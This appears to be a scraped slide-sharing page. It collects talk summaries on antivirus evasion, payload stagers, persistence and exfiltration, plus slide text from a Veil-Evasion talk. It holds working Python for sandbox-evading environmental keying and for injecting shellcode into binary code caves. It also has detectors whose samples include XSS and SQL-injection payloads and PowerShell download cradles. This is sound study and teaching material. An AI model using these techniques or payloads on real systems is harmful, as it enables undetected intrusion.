This talk is about how a single Python tool, Veil (also known as Veil-Evasion), can render antivirus useless. Veil's goal is to bypass antivirus products on workstations and servers.
This talk goes over the art of antivirus evasion, or really the lack thereof. I talk about a new module that's getting added into Veil-Evasion, a signature that was developed for Veil, and creating your own processes for approaching unknowns.
This is the slide deck I gave when presenting at FSU's AITP Meeting. The goal was to give a high level description of what Pen Testing/Red Teaming is and what the job entails.
The Supporting Role of Antivirus Evasion while Persisting (CTruncer)
This talk goes over different techniques to evade detection by antivirus programs, talks about how Veil-Evasion evades the programs, and shows an AV signature bypass. It also then documents a large number of techniques on how actors can persist in networks.
This talk is about developing malware in higher level languages. Languages such as Python or C# can give you the flexibility to quickly develop malware and use it on client engagements.
Ever Present Persistence - Established Footholds Seen in the Wild (CTruncer)
This talk is about different attacker persistence techniques that we have seen in the wild, or published by other companies. We wanted to create a massive document containing all of these techniques with a mile wide, inch deep approach. Our goal is to give a description of how each technique works and a way to detect them to allow anyone to start looking for these specific techniques.
This document summarizes the EyeWitness tool for automated network discovery and host identification. It discusses the typical assessment lifecycle, initial discovery and recon steps using Nmap and Nessus, and the need to automate analysis of large lists of web servers. The development of EyeWitness is described, from an initial proof of concept to version 2.0, which improved modularity, added protocol support, signature-based categorization and the ability to resume incomplete scans. Future work may include additional modules, protocols, and optical character recognition.
This is the talk given at NullCon 2017. It gives a history of the Veil Framework and showcases the differences between 2.0 and the newly released 3.0; Veil 3.0 was released with this talk.
This talk describes the current state of the Veil-Framework and the different tools included in it such as Veil-Evasion, Veil-Catapult, Veil-Powerview, Veil-Pillage, Veil-Ordnance
A Battle Against the Industry - Beating Antivirus for Meterpreter and More (CTruncer)
This talk goes over how stagers work in a different manner. Rather than standard function calls, I show how to utilize the same functionality in a slightly different way. It talks about Veil-Evasion, and a signature that was developed for it. Finally, I get into custom code and showcase three pieces of custom code that completely bypass antivirus.
Veil-Ordnance is a new tool recently added into the Veil-Framework. It's designed to quickly generate shellcode for exploits or use inside backdoor executables.
This talk is about why I believe having the ability to write tools and/or scripts can help elevate a Pen Testers game to the next level.
The talk is case study driven by the different scenarios I've encountered on assessments and the scripts or tools that have been developed as a result.
Windows 10 - Endpoint Security Improvements and the Implant Since Windows 2000 (CTruncer)
This document summarizes a talk about improvements to endpoint security in Windows 10 and how attackers have adapted. It discusses defenses like Device Guard and code integrity policies, as well as WMImplant, a tool developed by the presenters to operate on Device Guard systems using only Windows Management Instrumentation (WMI). WMImplant allows tasks like command execution, file transfer, and persistence via encoding and storing data in WMI properties. It also outlines methods defenders can use to detect malicious WMI usage like active WMI monitoring and the WMIMonitor tool.
CheckPlease is a tool that provides payload-agnostic checks to determine if malware is running in a targeted environment or sandbox. It evolved from signatures to behavioral detection as malware changed languages and used obfuscation. CheckPlease implements over 70 checks across multiple languages to validate processes, user behavior, system metadata and environment matches the target before executing malicious code. The presenters demonstrate various checks and encourage integrating CheckPlease with frameworks like Veil to automatically generate targeted malware payloads.
What Goes In Must Come Out: Egress-Assess and Data Exfiltration (CTruncer)
This presentation documents how Egress-Assess can be used on assessments to simulate exfiltrating data over a variety of protocols.
Additionally, this presentation documents the addition of malware modules into Egress-Assess. The new malware modules allow users to emulate different pieces of malware families by using documented malware indicators.
- The document discusses techniques for making payloads more targeted and resistant to sandbox analysis, including checking for expected parent processes, encrypting payloads with host-specific keys, and checking for signs of user interaction.
- It proposes a new open-source library called "CheckPlease" that implements these techniques across multiple programming languages to help red and blue teams.
- Examples are given of how to check for things like expected Windows domains, user accounts, mouse clicks or positions to ensure a payload is running in the intended targeted environment and not a sandbox.
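The environment checks and host-specific payload encryption described in the CheckPlease summaries above combine naturally into environmental keying: the payload is encrypted under a key derived from attributes only the intended host has, so in a sandbox the key is wrong and nothing is ever decrypted. The following is an added example written for this page, not CheckPlease's or Veil's own code; the domain, user and parent-process values are constructed, and a stdlib HMAC counter-mode keystream stands in for a real cipher so it runs without third-party libraries.

```python
import hashlib
import hmac
import os

# Constructed fingerprints for the example. A real check would read the live
# values, e.g. os.environ["USERDOMAIN"] / os.environ["USERNAME"] on Windows
# and the parent process name via the Windows API or psutil.
TARGET_ENV = {"domain": "CORP", "user": "jsmith", "parent": "explorer.exe"}
SANDBOX_ENV = {"domain": "WORKGROUP", "user": "admin", "parent": "cmd.exe"}


def environment_key(env: dict) -> bytes:
    """Derive a 32-byte key from host attributes the operator expects to find.
    Only a host reproducing exactly these values can reproduce the key."""
    material = "|".join(env[k].lower() for k in ("domain", "user", "parent"))
    return hashlib.sha256(material.encode()).digest()


def keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """HMAC-SHA256 in counter mode, a stdlib-only stream cipher for the
    example. Each (key, nonce) pair yields a distinct keystream."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        block = nonce + counter.to_bytes(4, "big")
        out += hmac.new(key, block, hashlib.sha256).digest()
        counter += 1
    return bytes(out[:length])


def seal_payload(payload: bytes, env: dict) -> bytes:
    """Encrypt payload under the target environment's key and bind an HMAC tag,
    so a wrong key is detected instead of producing garbage to execute."""
    key = environment_key(env)
    nonce = os.urandom(16)
    body = bytes(a ^ b for a, b in zip(payload, keystream(key, nonce, len(payload))))
    tag = hmac.new(key, nonce + body, hashlib.sha256).digest()
    return nonce + tag + body


def open_payload(blob: bytes, env: dict):
    """Return the plaintext if this environment reproduces the key, else None.
    In a sandbox the tag check fails and the payload stays opaque."""
    key = environment_key(env)
    nonce, tag, body = blob[:16], blob[16:48], blob[48:]
    expected = hmac.new(key, nonce + body, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        return None
    return bytes(a ^ b for a, b in zip(body, keystream(key, nonce, len(body))))


if __name__ == "__main__":
    blob = seal_payload(b"calc.exe", TARGET_ENV)
    print(open_payload(blob, TARGET_ENV))   # b'calc.exe'
    print(open_payload(blob, SANDBOX_ENV))  # None
```

The point for defenders is that an analyst who only has the blob cannot recover the payload without guessing the exact domain, user and parent process, so sandbox detonation alone tells you nothing; detonation needs to happen with the victim's environment reproduced, or the key material has to be recovered from the host where the sample was found.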
Egress-Assess and Owning Data Exfiltration (CTruncer)
This talk discusses how Egress-Assess can be used to help attackers and defenders learn how to exfiltrate data outside of their network over a variety of protocols, describes how data is exfiltrated over different supported protocols, and demonstrates the weaponization of the tool!
This is the slide deck that I used when presenting at FSU's Cyber Security Club. This presentation was supposed to give a description of what Red Teaming, Pen Testing, and other roles do.
This document provides an introduction to studying, collecting, and finding bugs. It discusses how to collect bugs by following security mailing lists, bug bounty programs, security researchers on Twitter. It also discusses how to study bugs by analyzing code diffs between vulnerable and patched versions, building test environments, and documenting findings. The document then covers hunting for bugs by finding targets on sites like GitHub and HackerNews, setting up test environments, and optimizing hunting strategies based on collected bugs. Finally, it discusses responsible disclosure of bugs and some of the author's favorite bugs.
Patching Windows Executables with the Backdoor Factory | DerbyCon 2013 (midnite_runr)
Patching Windows Executables with the Backdoor Factory is a presentation about binary patching techniques. It discusses the history of patching, how key generators and Metasploit patch binaries, and how the author learned to manually patch binaries. The presentation then introduces the Backdoor Factory tool, which can automatically patch Windows binaries by injecting shellcode into code caves. It demonstrates patching via code cave insertion, single cave jumps, and cave jumping. Mitigations like self-validation and antivirus are discussed.
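The summary above names the three techniques but not what a code cave is or how cave jumping chains them. The following is an added example written for this page, not the Backdoor Factory's own code: it finds caves (runs of null padding) in a buffer, spreads a shellcode blob across several of them with an x86 `jmp rel32` after each slice, and then walks the chain to verify the displacements. The buffer is a constructed stand-in for one PE section, so file offsets and virtual addresses are treated as equal; the real tool must also mark the chosen section executable and handle the entry point, which is left out here.

```python
import struct

JMP_LEN = 5  # E9 + 4-byte displacement


def find_caves(data: bytes, min_size: int = 32, fill: int = 0x00) -> list:
    """Return (offset, length) for every run of `fill` bytes at least min_size
    long. On a real PE, scan section bodies rather than headers."""
    caves, start = [], None
    sentinel = bytes([fill ^ 0xFF])           # terminates a trailing run
    for i, b in enumerate(data + sentinel):
        if b == fill:
            start = i if start is None else start
        elif start is not None:
            if i - start >= min_size:
                caves.append((start, i - start))
            start = None
    return caves


def jmp_rel32(src: int, dst: int) -> bytes:
    """Encode `jmp dst` placed at src. The displacement is relative to the end
    of the 5-byte instruction. Valid only when src and dst are in the same
    section, so that file-offset distance equals virtual-address distance."""
    return b"\xe9" + struct.pack("<i", dst - (src + JMP_LEN))


def cave_jump_patch(data: bytes, shellcode: bytes, caves: list, return_to: int):
    """Cave jumping: each cave gets a slice of the shellcode followed by a jmp to
    the next slice; the last slice jumps to return_to (normally the original
    entry point so the host program still runs). Returns (patched, layout),
    with layout = [(cave_offset, slice_length), ...] in execution order."""
    out = bytearray(data)
    layout = []
    usable = [(o, s) for o, s in caves if s > JMP_LEN]
    pos = 0
    for i, (off, size) in enumerate(usable):
        piece = shellcode[pos:pos + size - JMP_LEN]
        pos += len(piece)
        out[off:off + len(piece)] = piece
        layout.append((off, len(piece)))
        if pos == len(shellcode):
            target = return_to
        elif i + 1 < len(usable):
            target = usable[i + 1][0]
        else:
            raise ValueError("shellcode does not fit in the available caves")
        jmp_at = off + len(piece)
        out[jmp_at:jmp_at + JMP_LEN] = jmp_rel32(jmp_at, target)
        if pos == len(shellcode):
            return bytes(out), layout
    raise ValueError("no usable caves")


def walk_chain(patched: bytes, layout: list, return_to: int) -> bytes:
    """Follow the layout the way the CPU would: collect each slice and check
    that the jmp after it lands on the next slice (or back at return_to)."""
    collected = b""
    for i, (off, length) in enumerate(layout):
        collected += patched[off:off + length]
        jmp_at = off + length
        if patched[jmp_at] != 0xE9:
            raise ValueError(f"no jmp at {jmp_at:#x}")
        disp = struct.unpack("<i", patched[jmp_at + 1:jmp_at + JMP_LEN])[0]
        landed = jmp_at + JMP_LEN + disp
        expected = layout[i + 1][0] if i + 1 < len(layout) else return_to
        if landed != expected:
            raise ValueError(f"jmp at {jmp_at:#x} lands at {landed:#x}, expected {expected:#x}")
    return collected


# Constructed stand-in for a section body: NOPs with three null-filled gaps of
# 20, 40 and 12 bytes at offsets 16, 44 and 88. Not a real PE.
SAMPLE = (b"\x90" * 16 + b"\x00" * 20 + b"\x90" * 8 + b"\x00" * 40
          + b"\x90" * 4 + b"\x00" * 12 + b"\x90" * 8)

if __name__ == "__main__":
    caves = find_caves(SAMPLE, min_size=10)
    shellcode = bytes(range(1, 45))           # 44 placeholder bytes, no nulls
    patched, layout = cave_jump_patch(SAMPLE, shellcode, caves, return_to=0)
    print(caves, layout, walk_chain(patched, layout, 0) == shellcode)
```

Splitting the payload this way is what defeats signatures that expect the whole shellcode to be contiguous; the mitigation the talk mentions, self-validation, is the host program checksumming its own sections at start-up, which catches both the written slices and the inserted jumps.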
Dev and Blind - Attacking the weakest Link in IT Security (Mario Heiderich)
The developer is an easy and valuable target for malicious minds. The reasons for that are numerous and hard to come by. This talk delivers examples, proof, discussion and awkward moments in a pretty special way.
Everybody hates developers – especially web developers. And why not? The cracks and crevices of their APIs and implementations are the reason that vulnerabilities in web applications are still a widespread issue – and will continue to be in the foreseeable future.
Bashing and blaming them for their wrongdoings is fun – boy, they are stupid in their mistakes! But has anyone ever dared to have an open on stage battle with an actual developer?
And who of the developers dares to face their collective nemesis – the attacker? Can there be life where matter and anti-matter collide? We will know about this soon – because this is what this talk is going to be about. Developer versus attacker – vulnerability versus defense. Be prepared for swearing, violence and people leaving the stage prematurely in tears.
This document discusses techniques for going beyond automated tools and scans to hunt for vulnerabilities and gather intelligence as an information security professional. It provides defensive use cases like analyzing pcap files with tcpdump and Dshell to profile network activity. Offensive techniques discussed include pushing past roadblocks during pentests, abusing features like contact forms, and testing remediation. It emphasizes the value of learning scripting languages like Python to build your own tools for tasks like vulnerability scanning and demonstrating proof of concepts. The overall message is that security professionals should adopt a hunter/gatherer mindset to find issues missed by automated tools alone.
Mario Heiderich presents on generic attack detection using PHPIDS. PHPIDS uses 70 regex rules to detect attacks like XSS and SQLi by analyzing user input. It first normalizes the input, then detects patterns through a conversion and detection process, and can log or report any findings. PHPIDS aims to avoid blacklisting traps through this generic approach. Future work may include optimizing existing detection routines and adding more granular analysis techniques.
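The PHPIDS pipeline above (normalize, then run regex rules, then score and report) is easy to misread as plain blacklisting; the normalization step is what lets a small rule set survive encoding tricks. The following is an added example written for this page, not PHPIDS's code or its rule file: the four rules and the request parameters are constructed for the demonstration, and the impact scores are arbitrary.

```python
import html
import re
import urllib.parse

# (pattern, impact score, label). Illustrative rules, not PHPIDS's filter set.
RULES = [
    (r"<\s*script|javascript\s*:|on\w+\s*=", 4, "xss"),
    (r"['\"]\s*(?:or|and)\s+[\w'\"]+\s*=\s*[\w'\"]+", 4, "sqli tautology"),
    (r"union\s+(?:all\s+)?select|--|;\s*(?:drop|shutdown)\b", 3, "sqli"),
    (r"\.\./", 2, "path traversal"),
]


def normalize(value: str, rounds: int = 5) -> str:
    """Peel encoding layers until the string stops changing (URL decoding,
    including double encoding, and HTML entities), then remove nulls, turn SQL
    inline comments into whitespace, collapse whitespace and lowercase."""
    prev = None
    for _ in range(rounds):
        if value == prev:
            break
        prev = value
        value = urllib.parse.unquote_plus(value)
        value = html.unescape(value)
    value = value.replace("\x00", "")
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)
    value = re.sub(r"\s+", " ", value)
    return value.lower()


def inspect(params: dict) -> dict:
    """Run every rule over every normalized parameter and return the summed
    impact plus the (parameter, rule label) hits, like a PHPIDS result."""
    impact, hits = 0, []
    for name, raw in params.items():
        value = normalize(raw)
        for pattern, score, label in RULES:
            if re.search(pattern, value, flags=re.I):
                impact += score
                hits.append((name, label))
    return {"impact": impact, "hits": hits}


# Constructed request parameters for the demonstration.
SAMPLES = {
    "benign": {"q": "rock and roll", "page": "2"},
    "xss": {"comment": "<script>alert(1)</script>"},
    "double_encoded_xss": {"comment": "%253Cscript%253Ealert(1)%253C/script%253E"},
    "sqli": {"id": "1' OR '1'='1"},
    "commented_sqli": {"id": "1'/**/UNION/**/SELECT/**/password/**/FROM/**/users--"},
}

if __name__ == "__main__":
    for name, params in SAMPLES.items():
        print(f"{name:20s} {inspect(params)}")
```

Scoring rather than blocking on the first match is deliberate: a single weak rule such as the `on\w+=` fragment will fire on harmless input like `onion=1`, so the application acts on the accumulated impact (log at a low score, block or require re-authentication at a high one) instead of on any one pattern.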
No locked doors, no windows barred: hacking OpenAM infrastructure (Andrew Petukhov)
One of the main functional components of enterprise applications and Internet portals is an authentication and access control system (AuthC/Z). In this presentation, we describe a popular access control system called ForgeRock OpenAM from the external security point of view. We show the scenarios of full enterprise application compromise through complex attacks which employ both LFI and SSRF.
Building world-class security response and secure development processes (David Jorm)
The document discusses building world-class security response and secure development processes for OpenDaylight. It outlines the SDN attack surface, recent vulnerabilities in OpenDaylight, and defensive technologies. It discusses security response best practices for open source projects and secure engineering best practices. The current status of OpenDaylight security response and engineering is described, along with the vision to improve reactive security response capabilities and implement more proactive security measures like automated checks and security training.
The document discusses techniques for obfuscating PowerShell commands to evade detection. It begins by motivating the need for improved PowerShell logging and detection capabilities as PowerShell is increasingly used by attackers. It then outlines ways to prepare systems for PowerShell investigations through process auditing and command line logging. One section focuses on obfuscating the common technique of using New-Object Net.WebClient to perform remote downloads. It demonstrates how this command can be broken up and variables used to avoid detection based solely on the presence of certain strings.
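The summary above describes breaking up `New-Object Net.WebClient` with backticks, string concatenation and variables so that a plain string match on the command line never fires. The following is an added example written for this page, not code from the talk: it shows the constructed command lines a naive check misses, and a normalizer that undoes those three tricks before matching. The IP address, script name and indicator list are assumptions for the demonstration.

```python
import re

# Constructed command lines, as they might appear in process creation
# (Sysmon Event ID 1 / Security 4688 with command-line auditing) logs.
SAMPLES = [
    # plain form that a string match catches
    "powershell -c (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')",
    # backtick escapes split the cmdlet, type and method names
    "powershell -c (New-Obj`ect Net.WebC`lient).Down`loadString('http://198.51.100.7/a.ps1')",
    # concatenation plus variables, the trick the talk covers
    "powershell -c $t='Net.Web'+'Client'; $m='Download'+'String'; (New-Object $t).$m('http://198.51.100.7/a.ps1')",
    # benign administrative use
    "powershell -c Get-Service | Where-Object Status -eq 'Running'",
]

INDICATORS = [
    (r"new-object (?:system\.)?net\.webclient", "webclient"),
    (r"\.downloadstring\(", "downloadstring"),
    (r"\.downloadfile\(", "downloadfile"),
    (r"invoke-expression|\biex\b", "iex"),
]

CONCAT = re.compile(r"(['\"])([^'\"]*)\1\s*\+\s*(['\"])([^'\"]*)\3")
ASSIGN = re.compile(r"\$(\w+)\s*=\s*'([^']*)'\s*;")


def naive_match(cmd: str) -> bool:
    """The check the talk shows being evaded: a literal string on the raw line."""
    return "Net.WebClient" in cmd


def normalize_ps(cmd: str) -> str:
    """Undo the cheap obfuscations: drop backtick escapes, fold 'a'+'b' literals
    until nothing changes, then substitute simple $var='literal' assignments
    into later uses, and lowercase for case-insensitive matching."""
    s = cmd.replace("`", "")
    s = re.sub(r"\s+", " ", s)
    prev = None
    while prev != s:
        prev = s
        s = CONCAT.sub(lambda m: f"'{m.group(2)}{m.group(4)}'", s)
    for name, value in ASSIGN.findall(s):
        s = re.sub(r"\$" + re.escape(name) + r"\b", lambda _m, v=value: v, s)
    return s.lower()


def flag_download_cradle(cmd: str) -> list:
    """Return the indicator labels present after normalization."""
    norm = normalize_ps(cmd)
    return [label for pattern, label in INDICATORS if re.search(pattern, norm)]


if __name__ == "__main__":
    for cmd in SAMPLES:
        print(naive_match(cmd), flag_download_cradle(cmd), "|", cmd[:60])
```

This is still a command-line heuristic and will lose to the next layer of obfuscation (format strings, reversed strings, encoded commands). The durable fix is the logging the talk calls for: PowerShell Script Block Logging (Event ID 4104) records script blocks as the engine parses them, so a string assembled at runtime and handed to `Invoke-Expression` is logged in its assembled form, and the indicators above can be matched there without any normalization.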
EyeWitness - A Web Application Triage Tool (CTruncer)
EyeWitness is a web application triage tool. It's designed to take a file from the user containing web pages, gather server header information, take a screenshot of the web page, and then organize all the information in a report. Additionally, EyeWitness will warn you about invalid SSL certificates, and attempt to identify any default credentials that may apply to the website.
1. The document discusses the key chemical elements that make up the human body, including oxygen, carbon, hydrogen, nitrogen, calcium, and phosphorus.
2. It also explains the structure of atoms and how they form bonds through ionic and covalent interactions. Water is highlighted as being an ideal solvent for life due to its unique properties arising from hydrogen bonding.
3. The roles of acids, bases, and pH in solutions are covered. Buffers are described as substances that help maintain a stable pH when acids or bases are introduced.
New tools and excesses of political communication: exclusive interview... (Damien ARNAUD)
Anne-Claire Ruel (@AnneClaireRuel) teaches at the Université de Cergy-Pontoise, is a consultant in public-opinion strategy and a commentator on FranceTV Info and LCI.
The document discusses a talk titled "Docker might not be your friend - Trojanizing Docker like a Sir" given by Daniel García and Roberto Muñoz. The talk covers what Docker is, the Docker environment including components like Docker hosts, registries, and orchestrators. It also discusses continuous integration/continuous deployment cycles and how Docker fits into those processes. The slides provide definitions and diagrams to explain these concepts.
Rise of the Open Source Program Office for LinuxCon 2016 (Gil Yehuda)
Open Source Program Offices collaborate on open source, policy, governance, and github to help developers improve successful outcomes for open source strategy. We describe why OSPOs are emerging, how they work, and what this means to the open source industry. We highlight a Linux Foundation sponsored collaboration called the TODOGroup where program office directors are meeting to coordinate efforts and ideas.
The presentation was delivered at LinuxCon and ContainerCon in Tokyo, Japan in July 2016.
This document discusses Python tools for reverse engineering. It introduces the author and their background in security research. It then provides an overview of existing Python libraries for reverse engineering tasks like disassembly, debugging, fuzzing, and analysis. These include libraries that interface with tools like IDA Pro, gdb, bochs, and more. The document proposes creating a web portal to catalog these Python reverse engineering tools, including descriptions and a search function. It concludes by soliciting feedback on the idea and future work.
Demystifying Binary Reverse Engineering - Pixels Camp (André Baptista)
Reverse engineering is not just about uncovering the hidden behaviour of a given technology, system, program or device. It's actually an art and a mindset. Reversing is used by some government agencies, secret services, antivirus software companies, hackers and students. It can be used for many purposes: cracking/bypassing software, botnet analysis, finding 0day exploits, interpreting unknown protocols, understanding malware or finding bugs in apps.
This document discusses pentesting techniques using Python. It presents several Python scripts for activities such as port scanning, half-open (SYN) scanning, FIN scanning and collecting information from HTTP headers in order to test networks for vulnerabilities. The document also covers concepts such as pentesting, hackers versus pentesters, and why Python is a good language for pentesting.
James Jesus Bermas on Crash Course on Python (CP-Union)
This document provides an overview of the Python programming language. It introduces Python, discusses its uses in industries like Google and Industrial Light & Magic, and covers key Python concepts like data types, functions, object-oriented programming, modules, and tools. The document is intended to explain what Python is and give an introduction to programming in Python.
This document provides an overview of a session on introducing Python programming. It discusses the history and creators of Python, its features as a high-level, general purpose, multi-paradigm language. Examples are given of successful organizations using Python like Google, Mozilla, and CERN. Sample Python code is shown for word counting programs. Common questions about Python versions, development environments, debugging, and performance are addressed. Reasons for Python's readability and popularity over other languages are explored. References for further learning Python are provided.
This document provides an overview of a presentation about using human interface devices like keyboards for penetration testing. The presentation covers using the Teensy microcontroller to create payloads that are executed when the device is plugged into a target system. It demonstrates writing payloads using the Kautilya toolkit to perform attacks like installing backdoors, changing system settings, gathering information, and executing code on Windows and Linux machines. The document also discusses limitations and ways to prevent attacks using malicious human interface devices.
Security Testing for Containerized Applications (Soluto)
The document discusses security testing for containerized applications. It outlines different layers of containerized apps including code, dependencies, and Docker images. It then describes various security testing techniques that can be applied to each layer, including static analysis tools for code scanning, dependency scanning, and Docker image scanning. It also covers dynamic/runtime testing using passive and active scanning with tools like OWASP Zap. The document advocates building these security tests into the CI/CD pipeline and only deploying container images that pass all tests through a process of image certification. It demonstrates some of these techniques on a sample Lolcode application.
Presented by: Sahdev Zala
Presented at the All Things Open 2021
Raleigh, NC, USA
Raleigh Convention Center
Abstract: When it comes to the importance of writing secure code, it gets a unanimous vote. This is even more important for an open codebase. Remember that there are several areas where code security must be taken into consideration rather than just thinking about authentication and authorization. This talk is focused on identifying common areas in code that get overlooked and poses a security risk from general weaknesses to critical threat. You will also learn about various code analysis techniques and tools, simple examples to avoid common pitfalls and how to use GitHub to easily publish security advisories and CVEs.
DevSecCon Tel Aviv 2018 - Security Testing for Containerised Apps by Omer Levi (DevSecCon)
This document summarizes a presentation about security testing for containerized applications. It discusses performing static analysis on code, dependencies, and Docker images using open source tools like Bandit, Brakeman, Find Security Bugs, TSLint, OWASP Dependency Track, and Clair. It also covers dynamic analysis using passive and active scanning with OWASP Zap. The presentation demonstrates running these security tests on a sample Lolcode application and integrating the tests into a CI/CD pipeline using OWASP Glue. It provides resources for learning more about security testing of containerized apps.
1) The document discusses a presentation about Go and microservices given by Andrea Di Persio, a backend engineer at SoundCloud.
2) It covers an introduction to Go as a programming language, how SoundCloud uses Go and microservices in their infrastructure and applications, and how SoundCloud implements microservices using Go.
3) Some benefits of using Go and microservices at SoundCloud include isolated services that are easier to reason about and deploy independently while still being able to experiment and take ownership of specific domains.
Adversarial Post-Ex: Lessons From The Pros (Justin Warner)
This document provides an overview of lessons learned from studying the post-exploitation techniques of real adversaries. It discusses analyzing malware samples and threat reports to find new techniques, then implementing those techniques as proof-of-concept tools. Examples covered include recording audio and taking screenshots, monitoring Skype communications, exfiltrating files, capturing network packets, and mitigation strategies. The goal is to model realistic adversary behavior, both to emulate adversaries faithfully on red team assessments and to improve defensive capabilities.
Hacking Vulnerable Websites to Bypass Firewalls (Netsparker)
These slides were used by our security researcher Sven Morgenroth during the live demo of how to hack web applications and bypass firewalls. You can watch the live demo here: https://www.netsparker.com/blog/web-security/vulnerable-web-applications-developers-target/#livedemo
This document discusses the concepts of DevOps, SecOps, and DevSecOps. It describes how the traditional divisions between development, operations, and security can lead to problems, and how adopting a DevOps culture and practices like continuous integration, infrastructure as code, and automation can help break down silos. It emphasizes that DevSecOps is about collaboration, culture change, and bringing security practices into the development lifecycle from the beginning.
This document discusses techniques for analyzing obfuscated malicious web scripts. It begins by noting some limitations and objectives of the analysis. It then covers common obfuscation techniques used such as minification, visual noise, character encoding, and multiple layers of obfuscation. Methods for deobfuscation without wasting time are presented, such as using beautification tools and writing custom scripts. Specific tools are also highlighted that can aid in deobfuscation, like Didier Stevens tools and JavaScript analysis tools. Lastly, it discusses prevention best practices like keeping systems updated and avoiding unknown links/emails.
OWASP AppSec Global 2019 Security & Chaos Engineering (Aaron Rinehart)
Security today is customarily a reactive and chaotic exercise.
In this session, we will introduce a new concept known as Security Chaos Engineering and how it can be applied to create highly secure, performant, and resilient distributed systems.
DevOpsSec: Applying DevOps Principles to Security, DevOpsDays Austin 2012 (Nick Galbreath)
DevOpsSec applies DevOps principles like decentralization, shared resources, and transparency to security. It focuses on reducing the mean time to detect (MTTD) security issues and mean time to resolve (MTTR) them. Automating security testing and integrating it into continuous integration helps detect attacks and issues earlier. Treating security operations like other services improves culture.
StHack 2014 - Jerome "@funoverip" Nokin: Turning your managed AV into my botnet (StHack)
Today centrally managed Anti-Virus (AV) solutions are used across all enterprises and are relied upon to provide central management, logging and enforcement. This talk presents the journey and the results of reviewing the security posture of the core components of a few selected managed AV solutions, the central servers themselves. Critical security vulnerabilities will be presented, covering SQL Injection, Directory Path Traversal and Buffer Overflow. Particular focus will be given to the different steps required to fully compromise both central management servers and managed stations. Who does not want to transform a major managed AV into his private botnet within minutes?
Jerome Nokin works as a Security Consultant for Verizon Enterprise where he is a senior member of the Vulnerability Management Team mainly focusing on Penetration Tests and Web Application Assessment. Prior to his role at Verizon he worked in the area of security covering both consultancy and ICT.
This presentation was given to a group of SFS students at GW. It's designed to be semi-case study driven on the problems I've encountered on assessments and how programming can help solve them.
This document summarizes a presentation on bridging the gap between penetration testing and red teaming using offensive PowerShell techniques. It introduces Empire, a pure PowerShell post-exploitation agent, and discusses how weak standard images, dirty networks, and domain trusts can be exploited to escalate privileges and move laterally. Various PowerShell modules for tasks like credential dumping, code execution, and lateral movement are demonstrated.
This document discusses different methods for generating wordlists to crack passwords, including social engineering and dictionary attacks. It provides information on the software tool Crunch that can be used to generate wordlists with combinations of characters, numbers, and special characters. The document also covers different wireless security protocols like WEP, WPA, and WPA2 and vulnerabilities in WEP that allow the key to be cracked. It demonstrates social engineering attacks using a tool called Wifiphisher and dictionary attacks against WPA/WPA2 secured networks.
ZKorum: Building the Next Generation eAgora powered by SSI (SSIMeetup)
The immense potential unlocked by SSI in content-centric social networks (forums) is largely unaddressed by the recent wave of decentralized social networks. Enter ZKorum - a network of verifiable communities where members create anonymous polls and discussions. In this episode, Nicolas Gimenez, the Co-Founder and CTO of ZKorum, unveils the Alpha version and delves into its architecture, drawing inspiration from SSI, DWeb, and Password Managers.
Bringing Down the House - How One Python Script Ruled Over AntiVirus
1. Bringing Down the House - How One Python Script Ruled Over Antivirus
@ChrisTruncer
2. whoami
Chris Truncer
⊡ Systems Administrator turned Red Teamer
⊡ Red Team Lead at Mandiant
⊡ Open Source Developer
□ Veil-Framework
□ EyeWitness
□ and others...
3. What’s this talk about?
⊡ A pen tester’s problem
⊡ Shellcode injection
⊡ Veil-Evasion
⊡ Veil-Evasion’s approach
⊡ Signature bypass
⊡ Questions
5. What’s My Job?
⊡ Penetration testers and red teamers test the security of …. Something..
□ A website
□ An application
□ An office’s domain
□ A global distributed network
6. What’s My Job?
⊡ Tests are objective oriented
⊡ We don’t just hack everything for the lulz
⊡ Targeted in nature
□ Access internal payroll systems
□ Access customer lists
□ Steal company secrets
□ Wire money to a controlled account
□ ...etc.
10. Path to the Objective
⊡ Typically we will need to compromise workstations
⊡ To compromise systems, we introduce controlled viruses
⊡ However, we run into the same problems/roadblocks that real attackers do...
12. Our Problem
⊡ Bypassing antivirus is relatively trivial (demoed later)
⊡ I wanted an automated means to bypass antivirus
□ Let’s not waste time bypassing AV, use that time to better assess our customer’s environment
14. Our Problem
⊡ Myself, Will Schroeder, and Michael Wright decided to create a framework
□ Aggregate public AV bypass techniques
□ Automate the customization and compilation process
□ Modularize Veil to easily add new payload modules
⊡ The output is the source code, and an executable “stager”
16. Stagers
⊡ Stagers (Veil output) can be referred to as “stage 1”
⊡ The goal for stagers is to inject shellcode into memory and run it
⊡ The shellcode can connect to a remote system, receive additional code
⊡ Think of stagers as a loader for your real malware
17. Stagers
⊡ Any language that has access to Windows function calls can be used to write a stager
⊡ So… we started writing them in Python at first!
□ Debasish Mandal and Mark Baggett both developed proof of concepts for injecting shellcode into memory.
18. Stagers
⊡ It’s all done with four function calls
□ VirtualAlloc - Allocate space and assign memory permissions
□ RtlMoveMemory - Move shellcode into allocated space
□ CreateThread - Run the shellcode stored in memory
□ WaitForSingleObject - Don’t exit the process until the thread is done executing
25. Veil’s Approach
⊡ Veil is designed to beat on-disk detection through a variety of techniques:
□ Increasing code obfuscation
□ Encrypted code
□ Non-standard languages for Windows binaries (Python, Perl, Ruby)
28. Veil’s Approach
⊡ We observed that using a non-C or C# based language made a big difference
□ Antivirus didn’t understand how to properly inspect non-standard languages
⊡ Example
□ C vs. Python
32. Veil’s Approach
⊡ Invested heavily in Python module development
□ Basic letter substitution
□ Base64 encoded shellcode
□ Encrypted shellcode
⊡ Developed a payload which brute forces itself
33. Stallion
⊡ At runtime, the payload performs a chosen-ciphertext attack
□ With known ciphertext, it observes the cleartext output
⊡ Use a constrained keyspace
□ Ex: “IEjy2kDLJ*@%nfs9fSYEbdudfd” + “123456”
⊡ Loop over the constrained keyspace
⊡ If the decoded ciphertext matches the known plaintext value, then the key is discovered
38. Veil’s Signature
⊡ This was a step in the right direction by AV companies
□ We want them to step up their game
⊡ Previous attempts to categorize Veil have ended up quite humorous...
47. Generating Executables
⊡ Usability - Executable Generation
□ Wine became our best friend
□ Python installed within Wine
□ Required libraries installed within Wine
□ PyInstaller within Python on Wine
⊡ Extended this concept to all languages
□ Go
□ Ruby
□ C#
48. Generating Executables
⊡ We chose PyInstaller and Py2Exe since they are widely used
□ To prevent AV companies from just flagging all PyInstaller output
⊡ Some companies did this anyway...
52. Better Options
